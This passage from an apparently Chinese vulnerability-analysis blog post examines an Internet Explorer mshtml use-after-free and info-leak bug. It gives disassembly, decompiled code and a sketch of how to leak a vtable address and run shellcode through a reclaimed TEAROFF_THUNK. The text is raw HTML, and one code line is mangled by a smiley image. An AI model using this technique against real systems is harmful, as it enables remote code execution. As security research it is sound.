HeapFree(g_hProcessHeap, 0, (LPVOID)v2);<\/code><\/div>\n
}<\/code><\/div>\n
result = 0;<\/code><\/div>\n
}<\/code><\/div>\n
return result;<\/code><\/div>\n
}<\/code><\/div>\n
struct TEAROFF_THUNK<\/code><\/div>\n
{<\/code><\/div>\n
void *\u00a0\u00a0\u00a0\u00a0\u00a0 papfnVtblThis;\u00a0\u00a0\u00a0\u00a0 \/\/ Thunk's vtable<\/code><\/div>\n
ULONG\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ulRef;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ Reference count for this thunk.<\/code><\/div>\n
IID const * const * apIID;\u00a0\u00a0\u00a0\u00a0 \/\/ Short circuit QI using these IIDs.<\/code><\/div>\n
void *\u00a0\u00a0\u00a0\u00a0\u00a0 pvObject1;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ Delegate other methods to this object using...<\/code><\/div>\n
const void * apfnVtblObject1;\u00a0 \/\/ ...this array of pointers to member functions.<\/code><\/div>\n
void *\u00a0\u00a0\u00a0\u00a0\u00a0 pvObject2;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ Delegate methods to this object using...<\/code><\/div>\n
void *\u00a0\u00a0\u00a0\u00a0\u00a0 apfnVtblObject2;\u00a0\u00a0 \/\/ ...this array of pointers to member functions...<\/code><\/div>\n
DWORD\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 dwMask;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ ...the index of the method is set in the mask.<\/code><\/div>\n
DWORD\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 n;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ index of method into vtbl<\/code><\/div>\n
void *\u00a0\u00a0\u00a0\u00a0\u00a0 apVtblPropDesc;\u00a0\u00a0\u00a0 \/\/ array of propdescs in Vtbl order<\/code><\/div>\n
}<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

\u5982\u4e0a\u6240\u793a\uff0c\u540c\u65f6\u4f1a\u91ca\u653epvObject1\u548cpvObject2\uff0c\u4f1a\u8c03\u7528\u5230CAttrCollectionator::~CAttrCollectionator\uff0c\u8be5\u51fd\u6570\u4f1a\u5220\u9664\u5c5e\u6027\u6570\u7ec4\u4e2dDISPID\u4e3a8001145a\u7684\u5c5e\u6027\uff0c\u800conpropertychange\u7684DISPID\u4e3a8001179f\uff0c\u56e0\u6b64\u4f1a\u5bfc\u81f4onpropertychange\u5728\u5c5e\u6027\u6570\u7ec4\u4e2d\u7684\u4f4d\u7f6e\u524d\u79fb\uff0c\u5bfc\u81f4CAttrValue::Free \u8fd4\u56de\u540e\u8c03\u7528CImplAry::Delete\u65f6\u65e0\u6cd5\u5220\u9664onpropertychange\u5c5e\u6027\uff0c\u4f46\u662f\u53c8\u91ca\u653e\u4e86\u8be5\u63a5\u53e3\u6307\u9488\uff0c\u653e\u5165\u4e86dword_7515B03C\u3001dword_7515B040\u6307\u5411\u7684TEAROFF_THUNK\u7f13\u5b58\u4e2d\uff0c\u5bfc\u81f4\u4e0b\u6b21\u83b7\u53d6onpropertychange\u5c5e\u6027\u65f6\u4ecd\u7136\u53ef\u4ee5\u67e5\u627e\u5230\u8be5\u5c5e\u6027\uff0c\u6700\u7ec8\u5bfc\u81f4\u5185\u5b58\u5df2\u7ecf\u91ca\u653e\uff0c\u4f46\u7f13\u5b58\u548c\u5c5e\u6027\u6570\u7ec4\u4e2d\u4ecd\u7136\u6709\u6307\u5411\u8be5\u5185\u5b58\u7684\u6307\u9488\uff0c\u5f15\u8d77use after free\u6f0f\u6d1e\u3002<\/p>\n

\n
\n\n\n\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n<\/td>\n
\n
\n
.text:74C68B19 ; public: virtual __thiscall CAttrCollectionator::~CAttrCollectionator(void)<\/code><\/div>\n
.text:74C68B19 ??1CAttrCollectionator@@UAE@XZ proc near<\/code><\/div>\n
.text:74C68B19\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CODE XREF: CAttrCollectionator::`vector deleting destructor'(uint)+8p<\/code><\/div>\n
.text:74C68B19\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi, edi<\/code><\/div>\n
.text:74C68B1B\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
.text:74C68B1C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 3<\/code><\/div>\n
.text:74C68B1E\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 esi, ecx<\/code><\/div>\n
.text:74C68B20\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 8001145Ah<\/code><\/div>\n
.text:74C68B25\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 dword ptr [esi+14h]<\/code><\/div>\n
.text:74C68B28\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 dword ptr [esi], offset ??_7CAttrCollectionator@@6B@ ; const CAttrCollectionator::`vftable'<\/code><\/div>\n
.text:74C68B2E\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ?DidFindAAIndexAndDelete@CBase@@QAEHJW4AATYPE@CAttrValue@@@Z ; CBase::DidFindAAIndexAndDelete(long,CAttrValue::AATYPE)<\/code><\/div>\n
.text:74C68B33\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax, [esi+14h]<\/code><\/div>\n
.text:74C68B36\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx, [eax]<\/code><\/div>\n
.text:74C68B38\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 eax<\/code><\/div>\n
.text:74C68B39\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 dword ptr [ecx+0E0h]<\/code><\/div>\n
.text:74C68B3F\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 lea\u00a0\u00a0\u00a0\u00a0 eax, [esi+1Ch]<\/code><\/div>\n
.text:74C68B42\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ??1CImplAry@@QAE@XZ ; CImplAry::~CImplAry(void)<\/code><\/div>\n
.text:74C68B47\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx, esi<\/code><\/div>\n
.text:74C68B49\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
.text:74C68B4A\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jmp\u00a0\u00a0\u00a0\u00a0 ??1CBase@@UAE@XZ ; CBase::~CBase(void)<\/code><\/div>\n
.text:74C68B4A ??1CAttrCollectionator@@UAE@XZ endp<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

3.2.\u00a0\u00a0\u00a0\u00a0\u00a0 \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\u5206\u6790<\/h3>\n
\n
\n\n\n\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n
40<\/div>\n
41<\/div>\n
42<\/div>\n
43<\/div>\n
44<\/div>\n
45<\/div>\n<\/td>\n
\n
\n
.text:7503F5D8 ; public: long __stdcall COptionElement::get_index(long *)<\/code><\/div>\n
.text:7503F5D8 ?get_index@COptionElement@@QAGJPAJ@Z proc near<\/code><\/div>\n
.text:7503F5D8<\/code><\/div>\n
.text:7503F5D8 arg_0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = dword ptr\u00a0 8<\/code><\/div>\n
.text:7503F5D8 arg_4\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 = dword ptr\u00a0 0Ch<\/code><\/div>\n
.text:7503F5D8<\/code><\/div>\n
.text:7503F5D8\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi, edi<\/code><\/div>\n
.text:7503F5DA\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 ebp<\/code><\/div>\n
.text:7503F5DB\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ebp, esp<\/code><\/div>\n
.text:7503F5DD\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
.text:7503F5DE\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 edi<\/code><\/div>\n
.text:7503F5DF\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi, [ebp+arg_4]<\/code><\/div>\n
.text:7503F5E2\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 edi, edi<\/code><\/div>\n
.text:7503F5E4\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jnz\u00a0\u00a0\u00a0\u00a0 short loc_7503F5F0<\/code><\/div>\n
.text:7503F5E6\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 esi, [ebp+arg_0]<\/code><\/div>\n
.text:7503F5E9\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ?SetErrorInfoInvalidArg@CBase@@QAEJXZ ; CBase::SetErrorInfoInvalidArg(void)<\/code><\/div>\n
.text:7503F5EE\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jmp\u00a0\u00a0\u00a0\u00a0 short loc_7503F61A<\/code><\/div>\n
.text:7503F5F0 ; ---------------------------------------------------------------------------<\/code><\/div>\n
.text:7503F5F0<\/code><\/div>\n
.text:7503F5F0 loc_7503F5F0:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CODE XREF: COptionElement::get_index(long *)+Cj<\/code><\/div>\n
.text:7503F5F0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edx, [ebp+arg_0]<\/code><\/div>\n
.text:7503F5F3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 byte ptr [edx+32h], 2<\/code><\/div>\n
.text:7503F5F7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jz\u00a0\u00a0\u00a0\u00a0\u00a0 short loc_7503F618<\/code><\/div>\n
.text:7503F5F9\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx, edx<\/code><\/div>\n
.text:7503F5FB\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ?GetParentSelect@COptionElement@@QAEPAVCSelectElement@@XZ ; COptionElement::GetParentSelect(void)<\/code><\/div>\n
.text:7503F600\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 esi, eax<\/code><\/div>\n
.text:7503F602\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 esi, esi<\/code><\/div>\n
.text:7503F604\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jz\u00a0\u00a0\u00a0\u00a0\u00a0 short loc_7503F618<\/code><\/div>\n
.text:7503F606\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 edx<\/code><\/div>\n
.text:7503F607\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 lea\u00a0\u00a0\u00a0\u00a0 ecx, [esi+38h]<\/code><\/div>\n
.text:7503F60A\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ?Find@CImplPtrAry@@IAEHPAX@Z ; CImplPtrAry::Find(void *)<\/code><\/div>\n
.text:7503F60F\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx, esi<\/code><\/div>\n
.text:7503F611\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 ?RelIdxFromAbs@CSelectElement@@QAEJJ@Z ; CSelectElement::RelIdxFromAbs(long)<\/code><\/div>\n
.text:7503F616\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 [edi], eax<\/code><\/div>\n
.text:7503F618<\/code><\/div>\n
.text:7503F618 loc_7503F618:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CODE XREF: COptionElement::get_index(long *)+1Fj<\/code><\/div>\n
.text:7503F618\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; COptionElement::get_index(long *)+2Cj<\/code><\/div>\n
.text:7503F618\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 xor\u00a0\u00a0\u00a0\u00a0 eax, eax<\/code><\/div>\n
.text:7503F61A<\/code><\/div>\n
.text:7503F61A loc_7503F61A:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; CODE XREF: COptionElement::get_index(long *)+16j<\/code><\/div>\n
.text:7503F61A\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 edi<\/code><\/div>\n
.text:7503F61B\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
.text:7503F61C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 ebp<\/code><\/div>\n
.text:7503F61D\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 retn\u00a0\u00a0\u00a0 8<\/code><\/div>\n
.text:7503F61D ?get_index@COptionElement@@QAGJPAJ@Z endp<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

\u5f53\u6267\u884cvar table_pointer = document.createElement(\u2018option\u2019).index;\u65f6\uff0c\u4f1a\u8c03\u7528\u5230\u4e0a\u9762\u7684\u51fd\u6570\uff0c<\/p>\n

\u6b64\u5904\u7531\u4e8e\u8be5option\u5143\u7d20\u5c1a\u672a\u63d2\u5165select\u4e2d\uff0cCOptionElement::GetParentSelect\u5931\u8d25\uff0c\u5bfc\u81f4\u672a\u5bf9\u4f20\u5165\u7684\u5730\u5740\u8d4b\u503c\uff0c\u4f46\u662f\u8fd4\u56de\u503c\u4e0e\u6b63\u5e38\u8fd4\u56de\u65f6\u76f8\u540c\uff0c\u5bfc\u81f4\u4fe1\u606f\u6cc4\u9732\u3002<\/p>\n

\u6b64\u5904\u6cc4\u9732\u7684\u503c\u6307\u5411JavaScript\u5806\u4e0a\u7684\u4e34\u65f6\u53d8\u91cf\uff0c\u5176\u4e2d\u6bcf\u4e2a\u53d8\u91cf\u5360\u636e16\u4e2a\u5b57\u8282\u7a7a\u95f4\uff0c0-4\u5b57\u8282\u8868\u793a\u8be5\u53d8\u91cf\u7684\u7c7b\u578b\uff0c\u5982\u679c\u662f32\u4f4d\u6574\u6570\uff0c\u5219\u76f4\u63a5\u5b58\u653e\u57288-12\u5b57\u8282\uff0c\u5982\u679c\u4e3a\u5b57\u7b26\u4e32\uff0c\u52198-12\u5b57\u8282\u4e3a\u6307\u5411\u8be5\u5b57\u7b26\u4e32\u7684\u6307\u9488\u3002<\/p>\n

3.3.\u00a0\u00a0\u00a0\u00a0\u00a0 \u6f0f\u6d1e\u5229\u7528\u5206\u6790<\/h3>\n

\u7531\u4e8eTEAROFF_THUNK\u7ed3\u6784\u662f40\u5b57\u8282\u5927\u5c0f\uff0c\u53ef\u4ee5\u4f7f\u752840\u5b57\u8282\u5927\u5c0f\u7684\u5b57\u7b26\u4e32\u5360\u4f4d\u91ca\u653e\u7684\u5185\u5b58\uff0c\u5f53\u8c03\u7528expvalueclass.style.color = \u2018red\u2019;\u65f6\uff0c\u4f1a\u8c03\u7528\u5230CreateTearoffThunk\u51fd\u6570\uff0c\u8be5\u51fd\u6570\u4f1a\u83b7\u53d6<\/p>\n

\u4e00\u4e2aTEAROFF_THUNK\u7ed3\u6784\uff0c\u5148\u4ece\u7f13\u5b58\u4e2d\u83b7\u53d6\uff0c\u5982\u679c\u4e3a\u7a7a\u5219\u76f4\u63a5\u7533\u8bf7\u5927\u5c0f\u4e3a40\u7684\u5185\u5b58\uff0c\u6b64\u5904\uff0c\u91ca\u653e\u7684\u5185\u5b58\u88ab\u5b57\u7b26\u4e32\u5360\u4f4d\u540e\u540c\u65f6\u4e5f\u5728\u7f13\u5b58\u4e2d\uff0cCreateTearoffThunk\u51fd\u6570\u5bf9\u8be5\u7ed3\u6784\u521d\u59cb\u5316\uff0c\u8986\u76d6\u5199\u5165\u7684\u5b57\u7b26\u4e32\u5185\u5bb9\u3002<\/p>\n

\n
\n\n\n\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n
40<\/div>\n
41<\/div>\n
42<\/div>\n
43<\/div>\n
44<\/div>\n
45<\/div>\n
46<\/div>\n
47<\/div>\n
48<\/div>\n
49<\/div>\n<\/td>\n
\n
\n
unsigned int __userpurge CreateTearOffThunk(void **a1, void *a2, const void *a3, struct IUnknown *a4, void **a5, void *a6, signed int a7, const RECT *a8, const struct _GUID *const *a9, void *a10, unsigned __int8 a11)<\/code><\/div>\n
{<\/code><\/div>\n
void *v11; \/\/ ebx@1<\/code><\/div>\n
__int32 v12; \/\/ esi@2<\/code><\/div>\n
const RECT *v13; \/\/ eax@3<\/code><\/div>\n
unsigned int result; \/\/ eax@9<\/code><\/div>\n
<\/div>\n
v11 = a6;<\/code><\/div>\n
if ( a1 )<\/code><\/div>\n
{<\/code><\/div>\n
v11 = *a1;<\/code><\/div>\n
a5 = a1;<\/code><\/div>\n
a7 = 1;<\/code><\/div>\n
}<\/code><\/div>\n
v12 = InterlockedExchange(&dword_7515B03C, 0);<\/code><\/div>\n
if ( v12<\/code><\/div>\n
|| (v12 = InterlockedExchange(&dword_7515B040, 0)) != 0<\/code><\/div>\n
|| (v12 = (__int32)HeapAlloc(g_hProcessHeap, 0, 40u)) != 0 )<\/code><\/div>\n
{<\/code><\/div>\n
*(_DWORD *)(v12 + 4) = 0;<\/code><\/div>\n
*(_DWORD *)(v12 + 20) = a5;<\/code><\/div>\n
v13 = a8;<\/code><\/div>\n
*(_DWORD *)(v12 + 12) = a2;<\/code><\/div>\n
*(_DWORD *)(v12 + 16) = a3;<\/code><\/div>\n
*(_DWORD *)(v12 + 24) = v11;<\/code><\/div>\n
*(_DWORD *)(v12 + 28 ) = a7;<\/code><\/div>\n
if ( !a8 )<\/code><\/div>\n
v13 = &g_Zero;<\/code><\/div>\n
*(_DWORD *)(v12 + <img src=\"http:\/\/blog.vulnhunt.com\/wp-includes\/images\/smilies\/icon_cool.gif\" alt=\"8)\"> = v13;<\/code><\/div>\n
*(_DWORD *)(v12 + 36) = a9;<\/code><\/div>\n
JUMPOUT((unsigned __int8)a10 & 1, 0, sub_74DF5D80);<\/code><\/div>\n
*(_DWORD *)v12 = &off_7515CAF0;<\/code><\/div>\n
\/\/\u6b64\u59040-4\u5b57\u8282\u6307\u5411mshtml\u6a21\u5757\u4e2d\u7684\u865a\u51fd\u6570\u8868<\/code><\/div>\n
*(_BYTE *)(v12 + 34) = 0;<\/code><\/div>\n
*(_BYTE *)(v12 + 35) = (_BYTE)a10;<\/code><\/div>\n
if ( a2 && !(a7 & 2) )<\/code><\/div>\n
(*((void (__stdcall **)(_DWORD))a3 + 1))(a2);<\/code><\/div>\n
if ( a5 )<\/code><\/div>\n
(*((void (__stdcall **)(_DWORD))v11 + 1))(a5);<\/code><\/div>\n
a4->lpVtbl = (struct IUnknownVtbl *)v12;<\/code><\/div>\n
result = 0;<\/code><\/div>\n
}<\/code><\/div>\n
else<\/code><\/div>\n
{<\/code><\/div>\n
a4->lpVtbl = 0;<\/code><\/div>\n
result = 0x8007000Eu;<\/code><\/div>\n
}<\/code><\/div>\n
return result;<\/code><\/div>\n
}<\/code><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

\u5f53\u518d\u6b21\u83b7\u53d6title\u5c5e\u6027\u65f6\uff0c\u7531\u4e8e\u5b57\u7b26\u4e32\u5df2\u7ecf\u88ab\u4e0a\u9762\u7684\u64cd\u4f5c\u8986\u76d6\uff0c\u4fbf\u53ef\u4ee5\u83b7\u53d6\u5230mshtml\u6a21\u5757\u4e2d\u865a\u51fd\u6570\u8868\u7684\u5730\u5740\u3002<\/p>\n

\u5982\u679c\u88ab\u5b57\u7b26\u4e32\u5360\u4f4d\u540e\uff0c\u76f4\u63a5\u83b7\u53d6onpropertychange\u5c5e\u6027\uff0c\u5219\u4f1a\u8c03\u7528TEAROFF_HUNK\u7684\u865a\u51fd\u6570\uff0c\u89e6\u53d1shellcode\u6267\u884c\u3002<\/p>\n

\u901a\u8fc7\u63a7\u5236var table_pointer = document.createElement(\u2018option\u2019).index;\u4e0a\u9762\u6267\u884c\u7684\u8bed\u53e5\uff0c\u6211\u4eec\u53ef\u4ee5\u63a7\u5236\u6cc4\u9732\u7684\u5730\u5740\u6307\u5411\u7684\u5185\u5bb9\uff0c\u653e\u7f6eshellcode\u3002<\/p>\n

